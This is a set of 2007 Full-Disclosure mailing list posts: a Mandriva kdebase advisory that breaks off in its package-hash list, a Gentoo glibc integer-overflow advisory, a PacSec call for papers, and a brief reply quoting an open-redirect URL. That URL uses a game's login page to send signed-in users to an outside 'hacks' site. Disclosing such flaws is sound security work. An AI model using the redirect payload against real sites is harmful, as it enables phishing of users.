Fixed. -- kefka wrote: https://www.worldofwarcraft.com/login/login?service=http://kefkahacks.net/ User will be redirected once they login. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDKSA-2007:138 ] - Updated kdebase packages fix Flash Player interaction vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:138 http://www.mandriva.com/security/ ___ Package : kdebase Date: July 3, 2007 Affected: 2007.0, 2007.1, Corporate 3.0, Corporate 4.0 ___ Problem Description: An issue with the interaction between the Flash Player and the Konqueror web browser was discovered, which could lead to key presses leaking to the Flash Player instead of to the browser. This only affects users who have actually installed the Adobe Flash Player plugin. Updated packages have been patched to prevent this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2022 ___ Updated Packages: Mandriva Linux 2007.0: 55b6183eea4b1c059c04d98050e485ca 2007.0/i586/kdebase-3.5.4-35.1mdv2007.0.i586.rpm ff76838aaa3d313145a99550799cfb5e 2007.0/i586/kdebase-common-3.5.4-35.1mdv2007.0.i586.rpm c07814d4e91ca1b0665c68a5effd2e0d 2007.0/i586/kdebase-kate-3.5.4-35.1mdv2007.0.i586.rpm 38374a7263d94731d158bb538b5ad2c1 2007.0/i586/kdebase-kdeprintfax-3.5.4-35.1mdv2007.0.i586.rpm 3bf97c5d170d4a79130358f9221bca9c 2007.0/i586/kdebase-kdm-3.5.4-35.1mdv2007.0.i586.rpm 04fd7df030c04077b4e78793cc1a8776 2007.0/i586/kdebase-kmenuedit-3.5.4-35.1mdv2007.0.i586.rpm bc239eb585d37b0de83f3863aea30b69 2007.0/i586/kdebase-konsole-3.5.4-35.1mdv2007.0.i586.rpm feb76c618ff56425ad8d3ab39a8eac65 2007.0/i586/kdebase-nsplugins-3.5.4-35.1mdv2007.0.i586.rpm 1a1d30a4e59b70c71f57b2059cc14c05 2007.0/i586/kdebase-progs-3.5.4-35.1mdv2007.0.i586.rpm 23eac5d97fae7f19d7c00231b8a82937 2007.0/i586/libkdebase4-3.5.4-35.1mdv2007.0.i586.rpm 210c86bddf57723bd4d734347f02b762 2007.0/i586/libkdebase4-devel-3.5.4-35.1mdv2007.0.i586.rpm dd7c8293315ca7e6da8d216443a0df5e 2007.0/i586/libkdebase4-kate-3.5.4-35.1mdv2007.0.i586.rpm ee4eda9bba5d44a835f24575e1a2c8ad 2007.0/i586/libkdebase4-kate-devel-3.5.4-35.1mdv2007.0.i586.rpm e96c71ae5dfe9197546a2901bfff8f19 2007.0/i586/libkdebase4-kmenuedit-3.5.4-35.1mdv2007.0.i586.rpm 51cf95097a2bf7c0534487751789a184 2007.0/i586/libkdebase4-konsole-3.5.4-35.1mdv2007.0.i586.rpm c434ee3ab338242ab884fdcea88c62b8 2007.0/SRPMS/kdebase-3.5.4-35.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: facf219153303c396c67d4e5a3bb5934 2007.0/x86_64/kdebase-3.5.4-35.1mdv2007.0.x86_64.rpm 53eac5989c35cc0aa3ee78258b4bdf4d 2007.0/x86_64/kdebase-common-3.5.4-35.1mdv2007.0.x86_64.rpm e0bfc27d8c189768bf0c8faccf7cbd5c 2007.0/x86_64/kdebase-kate-3.5.4-35.1mdv2007.0.x86_64.rpm 0a6b7d77759f36770cf83b7e5d9e8142 2007.0/x86_64/kdebase-kdeprintfax-3.5.4-35.1mdv2007.0.x86_64.rpm 267d1c1b27653db1d1b4b71f4b5fadce 2007.0/x86_64/kdebase-kdm-3.5.4-35.1mdv2007.0.x86_64.rpm bae8ef34f45daedbdbde017df664a2fa 2007.0/x86_64/kdebase-kmenuedit-3.5.4-35.1mdv2007.0.x86_64.rpm 32a906facb7d3a5df421fcc85492ff55 2007.0/x86_64/kdebase-konsole-3.5.4-35.1mdv2007.0.x86_64.rpm 8a91816a3c8e41aa5d4d8bb2219a9de9 2007.0/x86_64/kdebase-nsplugins-3.5.4-35.1mdv2007.0.x86_64.rpm 0d5bbf7b6ac0a194d9e1b4ad1b6317ea 2007.0/x86_64/kdebase-progs-3.5.4-35.1mdv2007.0.x86_64.rpm 796d6bd603d4fe9a80a1daa95e6af15f 2007.0/x86_64/lib64kdebase4-3.5.4-35.1mdv2007.0.x86_64.rpm cb6bac260530b4fefdad824f959a5b08 2007.0/x86_64/lib64kdebase4-devel-3.5.4-35.1mdv2007.0.x86_64.rpm fb24ed311d2d7e6ef3049236fbb3e48b 2007.0/x86_64/lib64kdebase4-kate-3.5.4-35.1mdv2007.0.x86_64.rpm 05626565318404732bff67277a144d5a 2007.0/x86_64/lib64kdebase4-kate-devel-3.5.4-35.1mdv2007.0.x86_64.rpm 8456fc55f957a0cbade25cd14712bbc9 2007.0/x86_64/lib64kdebase4-kmenuedit-3.5.4-35.1mdv2007.0.x86_64.rpm 592d53cfe6b19da4c85789f88bdfdfa3 2007.0/x86_64/lib64kdebase4-konsole-3.5.4-35.1mdv2007.0.x86_64.rpm c434ee3ab338242ab884fdcea88c62b8 2007.0/SRPMS/kdebase-3.5.4-35.1mdv2007.0.src.rpm Mandriva Linux 2007.1: bdc38df1330e408d01915a4a858ffdae 2007.1/i586/kdebase-3.5.6-34.1mdv2007.1.i586.rpm 64885636d6aaf2bd35f9065dfe55b242 2007.1/i586/kdebase-common-3.5.6-34.1mdv2007.1.i586.rpm 49de64dc835669e62b2553848648fc25 2007.1/i586/kdebase-kate-3.5.6-34.1mdv2007.1.i586.rpm bea6ee3818bdf4dc0367e5e81676eb18 2007.1/i586/kdebase-kdeprintfax-3.5.6-34.1mdv2007.1.i586.rpm 867f7391b7f069bb08a44c7b73b3f02b 2007.1/i586/kdebase-kdm-3.5.6-34.1mdv2007.1.i586.rpm b7ae1f8214d9b23ab995d06a9145f449 2007.1/i586/kdebase-kmenuedit-3.5.6-34.1mdv2007.1.i586.rpm db045c8417506ed76b48be9b9677d5d9 2007.1/i586/kdebase-konsole-3.5.6-34.1mdv2007.1.i586.rpm 1202f927714780385a45044ba53354c9 2007.1/i586/kdebase-nsplugins-3.5.6-34.1mdv2007.1.i586.rpm bbd0c7c7f0413329c693ad9876e21b3b
[Full-disclosure] [ GLSA 200707-04 ] GNU C Library: Integer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GNU C Library: Integer overflow Date: July 03, 2007 Bugs: #183844 ID: 200707-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An integer overflow in the dynamic loader, ld.so, could result in the execution of arbitrary code with escalated privileges. Background == The GNU C library is the standard C library used by Gentoo Linux systems. It provides programs with basic facilities and interfaces to system calls. ld.so is the dynamic linker which prepares dynamically linked programs for execution by resolving runtime dependencies and related functions. Affected packages = --- Package / Vulnerable / Unaffected --- 1 sys-libs/glibc 2.5-r4= 2.5-r4 --- # Package 1 only applies to x86 users. Description === Tavis Ormandy of the Gentoo Linux Security Team discovered a flaw in the handling of the hardware capabilities mask by the dynamic loader. If a mask is specified with a high population count, an integer overflow could occur when allocating memory. Impact == As the hardware capabilities mask is honored by the dynamic loader during the execution of suid and sgid programs, in theory this vulnerability could result in the execution of arbitrary code with root privileges. This update is provided as a precaution against currently unknown attack vectors. Workaround == There is no known workaround at this time. Resolution == All users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =sys-libs/glibc-2.5-r4 References == [ 1 ] CVE-2007-3508 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3508 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200707-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpkJlgZ80MS2.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] PacSec 2007 Call For Papers (Nov. 29/30, deadline July 27)
PacSec CALL FOR PAPERS World Security Pros To Converge on Japan TOKYO, Japan -- To address the increasing importance of information security in Japan, the best known figures in the international security industry will get together with leading Japanese researchers to share best practices and technology. The most significant new discoveries about computer network hack attacks will be presented at the fifth annual PacSec conference to be discussed. The PacSec meeting provides an opportunity for foreign specialists to be exposed to Japanese innovation and markets and collaborate on practical solutions to computer security issues. In a relaxed setting with a mixture of material bilingually translated in both English and Japanese the eminent technologists can socialize and attend training sessions. Announcing the opportunity to submit papers for the PacSec 2007 network security training conference. The conference will be held November 29-30th in Tokyo. The conference focuses on emerging information security tutorials - it will be a bridge between the international and Japanese information security technology communities.. Please make your paper proposal submissions before July 27th, 2007. Slides for the papers must be submitted by October 1st 2007. The conference is November 29th and 30th 2007, presenters need to be available in the days before to meet with interpreters. A some invited papers have been confirmed, but a limited number of speaking slots are still available. The conference is responsible for travel and accomodations for the speakers. If you have a proposal for a tutorial session then please email a synopsis of the material and your biography, papers and, speaking background to secwest07 [at] pacsec.jp . Tutorials are one hour in length, but with simultaneous translation should be approximately 45 minutes in English, or Japanese. Only slides will be needed for the October paper deadline, full text does not have to be submitted. The PacSec conference consists of tutorials on technical details about current issues, innovative techniques and best practices in the information security realm. The audiences are a multi-national mix of professionals involved on a daily basis with security work: security product vendors, programmers, security officers, and network administrators. We give preference to technical details and education for a technical audience. The conference itself is a single track series of presentations in a lecture theater environment. The presentations offer speakers the opportunity to showcase on-going research and collaborate with peers while educating and highlighting advancements in security products and techniques. The focus is on innovation, tutorials, and education instead of product pitches. Some commercial content is tolerated, but it needs to be backed up by a technical presenter - either giving a valuable tutorial and best practices instruction or detailing significant new technology in the products. Paper proposals should consist of the following information: 1) Presenter, and geographical location (country of origin/passport) and contact info (e-mail, postal address, phone, fax). 2) Employer and/or affiliations. 3) Brief biography, list of publications and papers. 4) Any significant presentation and educational experience/background. 5) Topic synopsis, Proposed paper title, and a one paragraph description. 6) Reason why this material is innovative or significant or an important tutorial. 7) Where else has this material been presented or submitted? 8) Optionally, any samples of prepared material or outlines ready. Please forward the above information to secwest07 [at] pacsec.jp to be considered for placement on the speaker roster. cheers, --dr P.s. Some other dates of interest are announced: CanSecWest 2008 March 19-21 see http://cansecwest.com EUSecWest 2008 May 21/22 see http://eusecwest P.P.S. Also as a friendly reminder, CCC Camp is Aug 8 -12 2008, see http://events.ccc.de/camp/2007/Intro (Hi Julia et al...) Happy Independence Day and Canada Day, -- World Security Pros. Cutting Edge Training, Tools, and Techniques Tokyo, JapanNovember 29/30 - 2007http://pacsec.jp pgpkey http://dragos.com/ kyxpgp ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/